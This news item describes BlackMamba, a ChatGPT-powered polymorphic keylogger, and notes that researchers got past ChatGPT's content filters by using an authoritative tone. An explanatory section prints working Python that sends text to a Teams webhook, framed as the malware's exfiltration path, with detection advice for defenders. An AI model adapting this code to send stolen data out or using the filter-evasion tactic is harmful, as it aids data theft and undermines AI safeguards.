Jeff Sims, a researcher at the HYAS Institute, has created a proof-of-concept ChatGPT-powered malware called BlackMamba that can slip past Endpoint Detection and Response (EDR) filters. This should come as no surprise: CyberArk researchers reported in January of this year that ChatGPT could be exploited to create polymorphic malware. By adopting an authoritative tone, those researchers were able to get past ChatGPT's content filtering and generate polymorphic code during their tests.

According to the HYAS Institute's report (PDF), the malware can collect sensitive information such as usernames, debit and credit card numbers, passwords, and other confidential data that a user types into their device. BlackMamba then transfers the captured data to the attacker's Microsoft Teams channel via a Teams webhook, where it is "analysed, sold on the dark web, or utilised for other nefarious reasons," the report states.
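For context on the exfiltration channel: a Teams incoming webhook is an ordinary, Microsoft-documented endpoint that accepts a JSON POST and relays it into a channel, which is what makes it attractive as a low-friction exfiltration path. The minimal sketch below shows the generic mechanism only, not BlackMamba's actual code; the webhook URL is a placeholder, and outbound POSTs of this shape to `webhook.office.com` from unexpected processes are exactly the kind of traffic defenders can alert on.

```python
import json
import urllib.request

# Placeholder only -- real incoming-webhook URLs are issued per-channel by Teams.
WEBHOOK_URL = "https://example.webhook.office.com/webhookb2/..."


def build_payload(text: str) -> bytes:
    """Teams incoming webhooks accept a simple JSON body with a 'text' field."""
    return json.dumps({"text": text}).encode("utf-8")


def post_to_teams(url: str, text: str) -> str:
    """POST the JSON payload to the webhook and return the response body."""
    req = urllib.request.Request(
        url,
        data=build_payload(text),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode("utf-8")
```

Because the traffic is plain HTTPS to a legitimate Microsoft domain, it blends in with normal collaboration traffic, which is why the report highlights it.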
Read the full article here.

